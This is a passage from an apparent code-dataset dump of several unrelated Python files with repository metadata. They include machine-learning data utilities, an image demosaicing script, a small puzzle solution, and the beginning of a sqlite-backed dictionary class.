sum<0.00001:\n\t\tweights=wprev.copy()\n\teq=-(weights[1]/weights[3])*x-(weights[2]/weights[3])*y-(weights[0]/weights[3])\n\tax.plot_surface(x, y, eq,color='black',alpha=1)\n\tax.scatter(X2,Y2,Z2, c='r', marker='o')\n\tax.scatter(X1,Y1,Z1, c='g', marker='o')\n\treturn ax,\n\nseq=rs.generateRandom(999)\nseq.append(0)\nsum=4\nweights=np.random.normal(0,1,size=[4,1])#[1,1,1,1]\n\"\"\"for c in range(201):\n\tweights.append([1,1,1,1])\"\"\"\n\nanim = animation.FuncAnimation(fig,perceptron,fargs=(seq,sum,weights),frames = 2000,init_func = init,interval = 100,repeat=False,blit = True)\n#anim.save('perceptron.mp4', writer = 'ffmpeg', fps = 30)\t\t\nplt.show()\n\n################################# extra code not needed now #####################################################\n","repo_name":"debsouvik/Machine-learning-in-pyhton","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23376727442","text":"# -*- coding:utf-8 -*-\n__author__ = 'Randolph'\n\nimport os\nimport heapq\nimport multiprocessing\nimport gensim\nimport logging\nimport json\nimport numpy as np\n\nfrom collections import OrderedDict\nfrom pylab import *\nimport gensim.models.keyedvectors as word2vec\nfrom gensim.models.word2vec import LineSentence\nfrom tflearn.data_utils import pad_sequences\n\nALL_TEXTS_INPUT = '../data/test_Randolph/content.txt'\nMETADATA_STORE_PATH = '../data/test_Randolph/metadata.tsv'\n\n\ndef logger_fn(name, input_file, level=logging.INFO):\n tf_logger = logging.getLogger(name)\n tf_logger.setLevel(level)\n log_dir = os.path.dirname(input_file)\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n fh = logging.FileHandler(input_file, mode='w')\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n tf_logger.addHandler(fh)\n return tf_logger\n\n\ndef create_prediction_file(output_file, data_id,\n all_labels,\n all_predict_labels,\n all_predict_scores):\n \"\"\"\n Create the prediction file.\n\n Args:\n output_file: The all classes predicted results provided by network\n data_id: The data record id info provided by class Data\n all_labels: The all origin labels\n all_predict_labels: The all predict labels by threshold\n all_predict_scores: The all predict scores by threshold\n Raises:\n IOError: If the prediction file is not a <.json> file\n \"\"\"\n if not output_file.endswith('.json'):\n raise IOError(\"✘ The prediction file is not a json file.\"\n \"Please make sure the prediction data is a json file.\")\n with open(output_file, 'w') as fout:\n data_size = len(all_predict_labels)\n for i in range(data_size):\n predict_labels = [int(i) for i in all_predict_labels[i]]\n predict_scores = [round(i, 4) for i in all_predict_scores[i]]\n labels = [int(i) for i in all_labels[i]]\n data_record = OrderedDict([\n ('id', data_id[i]),\n ('labels', labels),\n ('predict_labels', predict_labels),\n ('predict_scores', predict_scores)\n ])\n fout.write(json.dumps(data_record, ensure_ascii=False) + '\\n')\n\n\ndef get_onehot_label_threshold(scores, threshold=0.5):\n \"\"\"\n Get the predicted onehot labels based on the threshold.\n If there is no predict score greater than threshold, then choose the label\n which has the max predict score.\n\n Args:\n scores: The all classes predicted scores provided by network\n threshold: The threshold (default: 0.5)\n Returns:\n predicted_onehot_labels: The predicted labels (onehot)\n \"\"\"\n predicted_onehot_labels = []\n scores = np.ndarray.tolist(scores)\n for score in scores:\n count = 0\n onehot_labels_list = [0] * len(score)\n for index, predict_score in enumerate(score):\n if predict_score >= threshold:\n onehot_labels_list[index] = 1\n count += 1\n if count == 0:\n max_score_index = score.index(max(score))\n onehot_labels_list[max_score_index] = 1\n predicted_onehot_labels.append(onehot_labels_list)\n return predicted_onehot_labels\n\n\ndef get_onehot_label_topk(scores, top_num=1):\n \"\"\"\n Get the predicted onehot labels based on the topK number.\n\n Args:\n scores: The all classes predicted scores provided by network\n top_num: The max topK number (default: 5)\n Returns:\n predicted_onehot_labels: The predicted labels (onehot)\n \"\"\"\n predicted_onehot_labels = []\n scores = np.ndarray.tolist(scores)\n for score in scores:\n onehot_labels_list = [0] * len(score)\n max_num_index_list = list(map(score.index, heapq.nlargest(top_num,\n score)))\n for i in max_num_index_list:\n onehot_labels_list[i] = 1\n predicted_onehot_labels.append(onehot_labels_list)\n return predicted_onehot_labels\n\n\ndef get_label_threshold(scores, threshold=0.5):\n \"\"\"\n Get the predicted labels based on the threshold.\n If there is no predict score greater than threshold, then choose the label\n which has the max predict score.\n Note: Only Used in `test_model.py`\n\n Args:\n scores: The all classes predicted scores provided by network\n threshold: The threshold (default: 0.5)\n Returns:\n predicted_labels: The predicted labels\n predicted_scores: The predicted scores\n \"\"\"\n predicted_labels = []\n predicted_scores = []\n scores = np.ndarray.tolist(scores)\n for score in scores:\n count = 0\n index_list = []\n score_list = []\n for index, predict_score in enumerate(score):\n if predict_score >= threshold:\n index_list.append(index)\n score_list.append(predict_score)\n count += 1\n if count == 0:\n index_list.append(score.index(max(score)))\n score_list.append(max(score))\n predicted_labels.append(index_list)\n predicted_scores.append(score_list)\n return predicted_labels, predicted_scores\n\n\ndef get_label_topk(scores, top_num=1):\n \"\"\"\n Get the predicted labels based on the topK number.\n Note: Only Used in `test_model.py`\n\n Args:\n scores: The all classes predicted scores provided by network\n top_num: The max topK number (default: 5)\n Returns:\n The predicted labels\n \"\"\"\n predicted_labels = []\n predicted_scores = []\n scores = np.ndarray.tolist(scores)\n for score in scores:\n score_list = []\n index_list = np.argsort(score)[-top_num:]\n index_list = index_list[::-1]\n for index in index_list:\n score_list.append(score[index])\n predicted_labels.append(np.ndarray.tolist(index_list))\n predicted_scores.append(score_list)\n return predicted_labels, predicted_scores\n\n\ndef create_metadata_file(embedding_size, output_file=METADATA_STORE_PATH):\n \"\"\"\n Create the metadata file based on the corpus file(Use for the Embedding\n Visualization later).\n\n Args:\n embedding_size: The embedding size\n output_file: The metadata file (default: 'metadata.tsv')\n Raises:\n IOError: If word2vec model file doesn't exist\n \"\"\"\n word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n\n if not os.path.isfile(word2vec_file):\n raise IOError(\"✘ The word2vec file doesn't exist.\"\n \"Please use function to create it!\")\n\n model = gensim.models.Word2Vec.load(word2vec_file)\n word2idx = dict([(k, v.index) for k, v in model.wv.vocab.items()])\n word2idx_sorted = [(k, word2idx[k]) for k in sorted(word2idx,\n key=word2idx.get,\n reverse=False)]\n\n with open(output_file, 'w+') as fout:\n for word in word2idx_sorted:\n if word[0] is None:\n print(\"Empty Line, should replaced by any thing else, \"\n \"r will cause a bug of tensorboard\")\n fout.write('' + '\\n')\n else:\n fout.write(word[0] + '\\n')\n\n\ndef create_word2vec_model(embedding_size,\n word2vec_path,\n input_file=ALL_TEXTS_INPUT):\n \"\"\"\n Create the word2vec model based on the given embedding size and the\n corpus file.\n\n Args:\n embedding_size: The embedding size\n input_file: The corpus file\n \"\"\"\n word2vec_path = '../data/word2vec_' + str(embedding_size) + '.model'\n\n sentences = LineSentence(input_file)\n \n # sg=0 means to use CBOW (default); sg=1 means use skip-gram model\n model = gensim.models.Word2Vec(sentences,\n size=embedding_size,\n min_count=0,\n sg=0,\n workers=multiprocessing.cpu_count())\n model.save(word2vec_path)\n\n\ndef load_vocab_size(embedding_size,\n word2vec_path):\n \"\"\"\n Return the vocab size of the word2vec file.\n\n Args:\n embedding_size: The embedding size\n word2vec_path: Path of word2vec\n Returns:\n The vocab size of the word2vec file\n Raises:\n IOError: If word2vec model file doesn't exist\n \"\"\"\n # word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n\n # word2vec_file = '../../Word2Vec/GoogleNews-vectors-negative300.bin'\n \n if not os.path.isfile(word2vec_path):\n raise IOError(\"✘ The word2vec file doesn't exist.\"\n \"Please use function to create it!\")\n\n # model = word2vec.Word2Vec.load(word2vec_file)\n model = word2vec.KeyedVectors.load_word2vec_format(\n word2vec_path, binary=True, limit=400000)\n\n return len(model.wv.vocab.items())\n\n\ndef data_word2vec(input_file,\n num_labels,\n word2vec_model):\n \"\"\"\n Create the research data token index based on the word2vec model file.\n Return the class Data(includes the data token index and data labels).\n\n Args:\n input_file: The research data\n num_labels: The number of classes\n word2vec_model: The word2vec model file\n Returns:\n The class Data(includes the data tokenindex and data labels)\n Raises:\n IOError: If the input file is not the .json file\n \"\"\"\n vocab = dict([(k, v.index) for (k, v) in word2vec_model.wv.vocab.items()])\n\n def _token_to_index(content):\n result = []\n for item in content:\n word2id = vocab.get(item)\n if word2id is None:\n word2id = 0\n result.append(word2id)\n return result\n\n def _create_onehot_labels(_labels_index,\n _num_labels):\n label = [0] * _num_labels\n for item in _labels_index:\n label[int(item)] = 1\n return label\n\n if not input_file.endswith('.json'):\n raise IOError(\"✘ The research data is not a json file. \"\n \"Please preprocess the research data into the \"\n \"json file.\")\n \n with open(input_file) as fin:\n test_id_list = []\n content_index_list = []\n labels_list = []\n onehot_labels_list = []\n labels_num_list = []\n total_line = 0\n\n for each_line in fin:\n data = json.loads(each_line)\n test_id = data['testid']\n features_content = data['features_content']\n labels_index = data['labels_index']\n labels_num = data['labels_num']\n\n test_id_list.append(test_id)\n content_index_list.append(_token_to_index(features_content))\n labels_list.append(labels_index)\n onehot_labels_list.append(_create_onehot_labels(labels_index,\n num_labels))\n labels_num_list.append(labels_num)\n total_line += 1\n\n class _Data:\n def __init__(self):\n pass\n\n @property\n def number(self):\n return total_line\n\n @property\n def testid(self):\n return test_id_list\n\n @property\n def tokenindex(self):\n return content_index_list\n\n @property\n def labels(self):\n return labels_list\n\n @property\n def onehot_labels(self):\n return onehot_labels_list\n\n @property\n def labels_num(self):\n return labels_num_list\n\n return _Data()\n\n\ndef data_word2vec_one_label(input_file,\n num_labels,\n word2vec_model):\n \"\"\"\n Create the research data token index based on the word2vec model file.\n Return the class Data(includes the data token index and data labels).\n\n Args:\n input_file: The research data\n num_labels: The number of classes\n word2vec_model: The word2vec model file\n Returns:\n The class Data(includes the data tokenindex and data labels)\n Raises:\n IOError: If the input file is not the .json file\n \"\"\"\n vocab = dict([(k, v.index) for (k, v) in word2vec_model.wv.vocab.items()])\n \n def _token_to_index(content):\n result = []\n for item in content:\n word2id = vocab.get(item)\n if word2id is None:\n word2id = 0\n result.append(word2id)\n return result\n \n # def _create_onehot_labels(_labels_index,\n # _num_labels):\n # label = [0] * _num_labels\n # for item in _labels_index:\n # label[int(item)] = 1\n # return label\n \n if not input_file.endswith('.json'):\n raise IOError(\"✘ The research data is not a json file. \"\n \"Please preprocess the research data into the \"\n \"json file.\")\n \n with open(input_file) as fin:\n test_id_list = []\n content_index_list_gov = []\n content_index_list_art = []\n # labels_list = []\n onehot_labels_list = []\n labels_num_list = []\n total_line = 0\n \n for each_line in fin:\n data = json.loads(each_line)\n test_id = data['testid']\n features_content_gov = data['gov']\n features_content_art = data['art']\n label = data['label']\n \n test_id_list.append(test_id)\n content_index_list_gov.append(_token_to_index(\n features_content_gov))\n content_index_list_art.append(_token_to_index(\n features_content_art))\n # labels_list.append(label)\n # onehot_labels_list.append(_create_onehot_labels(labels_index,\n # num_labels))\n onehot_labels_list.append(label)\n labels_num = 1\n labels_num_list.append(labels_num)\n total_line += 1\n \n class _Data:\n def __init__(self):\n pass\n \n @property\n def number(self):\n return total_line\n \n @property\n def testid(self):\n return test_id_list\n \n @property\n def tokenindex_gov(self):\n return content_index_list_gov\n \n @property\n def tokenindex_art(self):\n return content_index_list_art\n\n # @property\n # def labels(self):\n # return labels_list\n \n @property\n def onehot_labels(self):\n return onehot_labels_list\n \n @property\n def labels_num(self):\n return labels_num_list\n \n return _Data()\n\n\ndef data_augmented(data, drop_rate=1.0):\n \"\"\"\n Data augmented.\n\n Args:\n data: The Class Data()\n drop_rate: The drop rate\n Returns:\n aug_data\n \"\"\"\n aug_num = data.number\n aug_testid = data.testid\n aug_tokenindex = data.tokenindex\n aug_labels = data.labels\n aug_onehot_labels = data.onehot_labels\n aug_labels_num = data.labels_num\n\n for i in range(len(data.tokenindex)):\n data_record = data.tokenindex[i]\n if len(data_record) == 1: # 句子长度为 1,则不进行增广\n continue\n elif len(data_record) == 2: # 句子长度为 2,则交换两个词的顺序\n data_record[0], data_record[1] = data_record[1], data_record[0]\n aug_testid.append(data.testid[i])\n aug_tokenindex.append(data_record)\n aug_labels.append(data.labels[i])\n aug_onehot_labels.append(data.onehot_labels[i])\n aug_labels_num.append(data.labels_num[i])\n aug_num += 1\n else:\n data_record = np.array(data_record)\n for num in range(len(data_record) // 10): #\n # 打乱词的次数,次数即生成样本的个数;次数根据句子长度而定\n # random shuffle & random drop\n data_shuffled = np.random.permutation(\n np.arange(int(len(data_record) * drop_rate)))\n new_data_record = data_record[data_shuffled]\n\n aug_testid.append(data.testid[i])\n aug_tokenindex.append(list(new_data_record))\n aug_labels.append(data.labels[i])\n aug_onehot_labels.append(data.onehot_labels[i])\n aug_labels_num.append(data.labels_num[i])\n aug_num += 1\n\n class _AugData:\n def __init__(self):\n pass\n\n @property\n def number(self):\n return aug_num\n\n @property\n def testid(self):\n return aug_testid\n\n @property\n def tokenindex(self):\n return aug_tokenindex\n\n @property\n def labels(self):\n return aug_labels\n\n @property\n def onehot_labels(self):\n return aug_onehot_labels\n\n @property\n def labels_num(self):\n return aug_labels_num\n\n return _AugData()\n\n\ndef load_word2vec_matrix(vocab_size,\n embedding_size,\n word2vec_path):\n \"\"\"\n Return the word2vec model matrix.\n\n Args:\n vocab_size: The vocab size of the word2vec model file\n embedding_size: The embedding size\n word2vec_path: path of pretrained word2vec\n Returns:\n The word2vec model matrix\n Raises:\n IOError: If word2vec model file doesn't exist\n \n \"\"\"\n # word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n # word2vec_path = '../../Word2Vec/GoogleNews-vectors-negative300.bin'\n\n if not os.path.isfile(word2vec_path):\n raise IOError(\"✘ The word2vec file doesn't exist. \"\n \"Please use function to create it!\")\n\n model = word2vec.KeyedVectors.load_word2vec_format(word2vec_path,\n binary=True,\n limit=400000)\n\n vocab = dict([(k, v.index) for k, v in model.wv.vocab.items()])\n vector = np.zeros([vocab_size, embedding_size])\n for key, value in vocab.items():\n if key is not None:\n vector[value] = model[key]\n return vector\n\n\ndef load_data_and_labels(data_file,\n num_labels,\n embedding_size,\n data_aug_flag,\n word2vec_path,\n use_pretrain=True):\n \"\"\"\n Load research data from files, splits the data into words and generates\n labels. Return split sentences, labels and the max sentence length of\n the research data.\n\n Args:\n data_file: The research data\n num_labels: The number of classes\n embedding_size: The embedding size\n data_aug_flag: The flag of data augmented\n word2vec_path: path of pretrained word2vec\n use_pretrain: whether to use pretrained word2vec\n Returns:\n The class Data\n \"\"\"\n ###########################################################################\n #\n # word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n #\n # # Load word2vec model file\n # if not os.path.isfile(word2vec_file):\n # create_word2vec_model(embedding_size, TEXT_DIR)\n ###########################################################################\n \n # word2vec_path = '../../Word2Vec/GoogleNews-vectors-negative300.bin'\n \n if use_pretrain:\n model = word2vec.KeyedVectors.load_word2vec_format(word2vec_path,\n binary=True,\n limit=400000)\n else:\n create_word2vec_model(embedding_size,\n ALL_TEXTS_INPUT)\n\n # Load data from files and split by words\n data = data_word2vec(input_file=data_file,\n num_labels=num_labels,\n word2vec_model=model)\n if data_aug_flag:\n data = data_augmented(data)\n\n # plot_seq_len(data_file, data)\n\n return data\n\n\ndef load_data_and_labels_one_label(data_file,\n num_labels,\n embedding_size,\n data_aug_flag,\n word2vec_path,\n use_pretrain=True):\n \"\"\"\n Load research data from files, splits the data into words and generates\n labels. Return split sentences, labels and the max sentence length of\n the research data.\n\n Args:\n data_file: The research data\n num_labels: The number of classes\n embedding_size: The embedding size\n data_aug_flag: The flag of data augmented\n word2vec_path: path of pretrained word2vec\n use_pretrain: whether to use pretrained word2vec\n Returns:\n The class Data\n \"\"\"\n \n ###########################################################################\n #\n # word2vec_file = '../data/word2vec_' + str(embedding_size) + '.model'\n #\n # # Load word2vec model file\n # if not os.path.isfile(word2vec_file):\n # create_word2vec_model(embedding_size, TEXT_DIR)\n ###########################################################################\n \n # word2vec_path = '../../Word2Vec/GoogleNews-vectors-negative300.bin'\n \n if use_pretrain:\n model = word2vec.KeyedVectors.load_word2vec_format(word2vec_path,\n binary=True,\n limit=250000)\n else:\n create_word2vec_model(embedding_size,\n ALL_TEXTS_INPUT)\n \n # Load data from files and split by words\n data = data_word2vec_one_label(input_file=data_file,\n num_labels=num_labels,\n word2vec_model=model)\n if data_aug_flag:\n data = data_augmented(data)\n \n # plot_seq_len(data_file, data)\n \n return data\n\n\ndef pad_data(data, pad_seq_len):\n \"\"\"\n Padding each sentence of research data according to the max sentence length.\n Return the padded data and data labels.\n\n Args:\n data: The research data\n pad_seq_len: The max sentence length of research data\n Returns:\n pad_seq: The padded data\n labels: The data labels\n \"\"\"\n pad_seq = pad_sequences(data.tokenindex, maxlen=pad_seq_len, value=0.)\n onehot_labels = data.onehot_labels\n return pad_seq, onehot_labels\n\n\ndef pad_data_one_label(data,\n pad_seq_len_gov,\n pad_seq_len_art):\n \"\"\"\n Padding each sentence of research data according to the max sentence length.\n Return the padded data and data labels.\n\n Args:\n data: The research data\n pad_seq_len: The max sentence length of research data\n Returns:\n pad_seq: The padded data\n labels: The data labels\n \"\"\"\n pad_seq_gov = pad_sequences(data.tokenindex_gov,\n maxlen=pad_seq_len_gov,\n value=0.)\n \n pad_seq_art = pad_sequences(data.tokenindex_art,\n maxlen=pad_seq_len_art,\n value=0.)\n\n onehot_labels = data.onehot_labels\n return pad_seq_gov, \\\n pad_seq_art, \\\n onehot_labels\n\n\ndef plot_seq_len(data_file, data, percentage=0.98):\n \"\"\"\n Visualizing the sentence length of each data sentence.\n\n Args:\n data_file: The data_file\n data: The class Data (includes the data tokenindex and data labels)\n percentage: The percentage of the total data you want to show\n \"\"\"\n data_analysis_dir = '../data/data_analysis/'\n if 'train' in data_file.lower():\n output_file = data_analysis_dir + \\\n 'Train Sequence Length Distribution Histogram.png'\n if 'validation' in data_file.lower():\n output_file = data_analysis_dir + \\\n 'Validation Sequence Length Distribution Histogram.png'\n if 'test' in data_file.lower():\n output_file = data_analysis_dir + \\\n 'Test Sequence Length Distribution Histogram.png'\n result = dict()\n for x in data.tokenindex:\n if len(x) not in result.keys():\n result[len(x)] = 1\n else:\n result[len(x)] += 1\n freq_seq = [(key, result[key]) for key in sorted(result.keys())]\n x = []\n y = []\n avg = 0\n count = 0\n border_index = []\n for item in freq_seq:\n x.append(item[0])\n y.append(item[1])\n avg += item[0] * item[1]\n count += item[1]\n if count > data.number * percentage:\n border_index.append(item[0])\n avg = avg / data.number\n print('The average of the data sequence length is {0}'.format(avg))\n print('The recommend of padding sequence length should more than {0}'.\n format(border_index[0]))\n xlim(0, 400)\n plt.bar(x, y)\n plt.savefig(output_file)\n plt.close()\n\n\ndef batch_iter(data, batch_size, num_epochs, shuffle=True):\n \"\"\"\n 含有 yield 说明不是一个普通函数,是一个 Generator.\n 函数效果:对 data,一共分成 num_epochs 个阶段(epoch),在每个 epoch 内,如果\n shuffle=True,就将 data 重新洗牌,\n 批量生成 (yield) 一批一批的重洗过的 data,每批大小是 batch_size,\n 一共生成 int(len(data)/batch_size)+1 批。\n\n Args:\n data: The data\n batch_size: The size of the data batch\n num_epochs: The number of epochs. Assign 1 for in the test time.\n shuffle: Shuffle or not (default: True)\n Returns:\n A batch iterator for data set\n \"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((data_size - 1) / batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]\n","repo_name":"syyunn/DeepWTO","sub_path":"utils/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":26888,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"72219512089","text":"import cv2\nimport numpy as np\nimport glob\nimport os\nimport argparse\n\n\ndef demosaic(raw_image):\n return cv2.cvtColor(raw_image, cv2.COLOR_BAYER_BG2BGR)\n\n\ndef rescale(rgb_image, dtype):\n if dtype == 'float32':\n max = 1.0\n elif dtype == 'uint8':\n max = 255.0\n elif dtype == 'uint16':\n max = 65535.0\n else:\n raise ValueError('not supported data type.')\n\n # Rescaale pixel value range\n rgb_image = rgb_image.astype(np.float32)\n rgb_image = rgb_image / np.max(rgb_image)\n rgb_image = np.clip(rgb_image, 0.0, 1.0) * max\n rgb_image = rgb_image.astype(dtype)\n\n return rgb_image\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--load_dir', type=str, required=True, help='input dir that contains rgb images')\n parser.add_argument('--save_dir', type=str, required=True, help='output dir that saves y, u and v images')\n parser.add_argument('--width', type=int, required=True, help='raw input width')\n parser.add_argument('--height', type=int, required=True, help='raw input height')\n parser.add_argument('--ext', type=str, default='raw', help='search extension')\n parser.add_argument('--data_type', type=str, default='float32', choices=['float32', 'uint8', 'uint16'], help='input data type')\n args = parser.parse_args()\n\n if args.data_type == 'float32':\n data_type = np.float32\n elif args.data_type == 'uint8':\n data_type = np.uint8\n elif args.data_type == 'uint16':\n data_type = np.uint16\n else:\n raise ValueError('not supported data type.')\n\n files = sorted(glob.glob(os.path.join(args.load_dir, '*.' + args.ext)))\n for i, file in enumerate(files):\n raw_data = np.fromfile(file, data_type)\n raw_image = raw_data.reshape(args.height, args.width, 1)\n\n rgb_image = demosaic(raw_image)\n rgb_image = rescale(rgb_image, rgb_image.dtype)\n\n if not os.path.exists(args.save_dir):\n os.makedirs(args.save_dir)\n file_name = os.path.splitext(os.path.basename(file))[0]\n cv2.imwrite(os.path.join(args.save_dir, file_name + '.png'), rgb_image)\n\n print('{} / {} finished!'.format(i+1, len(files)))\n","repo_name":"ksekine/raw_rgb_converter","sub_path":"raw2rgb.py","file_name":"raw2rgb.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10475382532","text":"# 시간초과대박\nimport sys\nm = int(input())\ndata = set()\n\nfor _ in range(m):\n command = sys.stdin.readline().rstrip().split()\n if len(command) == 1:\n if command[0] == \"all\":\n data.clear()\n data = set([i for i in range(1, 21)])\n else:\n data = set()\n continue\n\n x = int(command[1])\n command = command[0]\n if command == \"add\":\n data.add(x)\n elif command == \"remove\":\n if x in data: data.remove(x)\n elif command == \"check\":\n print(1 if x in data else 0)\n elif command == \"toggle\":\n if x in data:\n data.remove(x)\n else:\n data.add(x)","repo_name":"jim4020key/problemsolving","sub_path":"집합.py","file_name":"집합.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13815041661","text":"\r\nimport os\r\nimport cPickle\r\nimport sqlite3\r\n\r\n__version__ = '0.5'\r\n\r\nMTN = 'DICTIONARY_TABLE' #MTN -> Magic Table Name\r\nsentinel = object()\r\nisfile = os.path.isfile\r\n\r\ndef sq_dict_open(filename, flag='w', mtn=MTN):\r\n if flag == 'c':\r\n flag = 'w'\r\n return SqLiteDictionary(filename, flag, mtn)\r\n\r\ndef btopen(filename, flag='w', mtn=MTN):\r\n if flag == 'c':\r\n flag = 'w'\r\n return OrderedSqLiteDictionary(filename, flag, mtn)\r\n\r\ndef shelve(filename, flag='w', mtn=MTN):\r\n if flag == 'c':\r\n flag = 'w'\r\n return ShelveSqLiteDictionary(filename, flag, mtn)\r\n\r\ndef ashelve(filename, flag='w', mtn=MTN):\r\n if flag == 'c':\r\n flag = 'w'\r\n return ArbitrarySqLiteDictionary(filename, flag, mtn)\r\n\r\ndef _explain(db, q, args):\r\n _row = ['addr', 'opcode', 'p1', 'p2', 'p3', 'p4', 'p5', 'comment']\r\n rows = list(map(str, i) for i in db.execute(\"EXPLAIN \"+q, args))\r\n rows.insert(0, row)\r\n for i, row in enumerate(rows):\r\n while len(row) != len(_row):\r\n row.append('')\r\n cw = [max(map(len, i)) for i in zip(*rows)]\r\n rows.insert(1, [i*'-' for i in cw])\r\n fstring = ' '.join('%%%is'%i for i in cw)\r\n return '\\n'.join(fstring%tuple(i) for i in rows)\r\n\r\n'''\r\nflag\tmeaning\r\n----\t-------\r\nr\t\tread-only\r\nw\t\tread-write\r\n'''\r\n\r\nclass SqLiteDictionary(object):\r\n __slots__ = '_flag', '_db', '_cursor', '_mtn', 'autosync', '_orderby'\r\n def __init__(self, filename, flag, mtn, autosync=0):\r\n # check flag\r\n if flag not in ('r', 'w'):\r\n raise ValueError(\r\n \"flag argument must be 'r' or 'w'; not %r\"%(flag,))\r\n self._flag = flag\r\n\r\n self._mtn = mtn\r\n\r\n # check whether the file exists\r\n if filename != ':memory:':\r\n if self._flag == 'r':\r\n os.stat(filename)\r\n elif self._flag == 'r':\r\n # in-memory database that is to be read-only?\r\n raise IOError(\"File not found\")\r\n\r\n # open the db and check for the table\r\n self._db = sqlite3.connect(filename)\r\n for name, in self._db.execute(\"SELECT name FROM sqlite_master\"):\r\n if name == self._mtn:\r\n continue\r\n break\r\n else:\r\n if self._flag == 'w':\r\n self._create_table()\r\n else:\r\n raise ValueError(\r\n \"Dictionary table %s does not exist within sqlite database\"%\r\n self._mtn)\r\n self._cursor = None\r\n self.autosync = autosync\r\n self._orderby = ' ORDER BY ROWID '\r\n\r\n#------------------------------- internal bits -------------------------------\r\n def _create_table(self):\r\n self._db.execute('''\r\n CREATE TABLE %s (\r\n ROWKEY BLOB PRIMARY KEY,\r\n ROWVAL BLOB);'''%self._mtn)\r\n\r\n @staticmethod\r\n def _check_key(key):\r\n if type(key) not in (str, buffer):\r\n raise ValueError(\r\n \"Can only use str instances as keys, not %r\"%(type(key),))\r\n return buffer(key)\r\n\r\n @staticmethod\r\n def _check_value(value):\r\n if type(value) not in (str, buffer):\r\n raise ValueError(\r\n \"Can only use str instances as values, not %r\"%(type(value),))\r\n return buffer(value)\r\n\r\n @staticmethod\r\n def _ke(key):\r\n return KeyError(\"Key %r not found\"%(key,))\r\n\r\n @classmethod\r\n def _ro(cls):\r\n return TypeError(\r\n \"Read-only instance of %s does not support item assignment\"%\r\n (cls.__name__,))\r\n\r\n#----------------------- standard sequence operations ------------------------\r\n def __len__(self):\r\n for length, in self._db.execute(\"SELECT count(1) FROM %s\"%self._mtn):\r\n return length\r\n # should never get here\r\n\r\n def __iter__(self):\r\n QUERY = \"SELECT ROWKEY FROM %s %s\"%(self._mtn, self._orderby)\r\n for rowkey, in self._db.execute(QUERY):\r\n yield str(rowkey)\r\n\r\n def __contains__(self, key):\r\n key = self._check_key(key)\r\n try:\r\n self[key]\r\n except KeyError:\r\n return 0\r\n return 1\r\n\r\n def __getitem__(self, key):\r\n key = self._check_key(key)\r\n QUERY = \"SELECT ROWVAL FROM %s WHERE ROWKEY = ?\"%self._mtn\r\n for rowval, in self._db.execute(QUERY, (key,)):\r\n return str(rowval)\r\n raise self._ke(key)\r\n\r\n def __setitem__(self, key, value):\r\n if self._flag == 'r':\r\n raise self._ro()\r\n key = self._check_key(key)\r\n value = self._check_value(value)\r\n QUERY = \"REPLACE INTO %s (ROWKEY, ROWVAL) VALUES (?, ?)\"%self._mtn\r\n self._db.execute(QUERY, (key, value))\r\n if self.autosync:\r\n self.sync()\r\n\r\n def __delitem__(self, key):\r\n if self._flag == 'r':\r\n raise self._ro()\r\n key = self._check_key(key)\r\n QUERY = \"DELETE FROM %s WHERE ROWKEY = ?\"%self._mtn\r\n if self._db.execute(QUERY, (key,)) < 1:\r\n raise self._ke(key)\r\n if self.aytosync:\r\n self.sync()\r\n\r\n#---------------------------- dictionary iterface ----------------------------\r\n has_key = __contains__\r\n\r\n def get(self, key, default=None):\r\n try:\r\n return self[key]\r\n except KeyError:\r\n return default\r\n\r\n def pop(self, key, default=sentinel):\r\n try:\r\n default = self[key]\r\n del self[key]\r\n except KeyError:\r\n if default is sentinel:\r\n raise\r\n return default\r\n\r\n def popitem(self, key, default=sentinel):\r\n value = self.pop(key, default)\r\n return key, value\r\n\r\n def setdefault(self, key, default):\r\n value = self.get(key, sentinel)\r\n if value is sentinel:\r\n self[key] = value = default\r\n return default\r\n\r\n # keys\r\n def keys(self):\r\n return Keys(self)\r\n\r\n iterkeys = keys\r\n\r\n # values\r\n def values(self):\r\n return Values(self)\r\n\r\n itervalues = values\r\n\r\n def _itervalues(self):\r\n for i,j in self._iteritems():\r\n yield j\r\n\r\n # items\r\n def items(self):\r\n return Items(self)\r\n\r\n iteritems = items\r\n\r\n def _iteritems(self):\r\n QUERY = \"SELECT ROWKEY, ROWVAL FROM %s %s\"%(self._mtn, self._orderby)\r\n for i,j in self._db.execute(QUERY):\r\n yield str(i), str(j)\r\n\r\n # update\r\n def update(self, other):\r\n if hasattr(other, 'iteritems'):\r\n other = other.iteritems()\r\n elif hasattr(other, 'items'):\r\n other = other.items()\r\n for i,j in other:\r\n self[i] = j\r\n\r\n # clear\r\n def clear(self):\r\n self._db.execute(\"DELETE FROM %s\"%self._mtn)\r\n\r\n def _slowclear(self):\r\n self._db.execute(\"DELETE FROM %s WHERE 1\"%self._mtn)\r\n\r\n#---------------------------- dbm-like interface -----------------------------\r\n def sync(self):\r\n self._db.commit()\r\n\r\n def close(self):\r\n if self._db is not None:\r\n self.sync()\r\n self._cursor = None\r\n self._db.close()\r\n self._db = None\r\n\r\nclass OrderedSqLiteDictionary(SqLiteDictionary):\r\n def __init__(self, filename, flag, mtn, autosync=0):\r\n 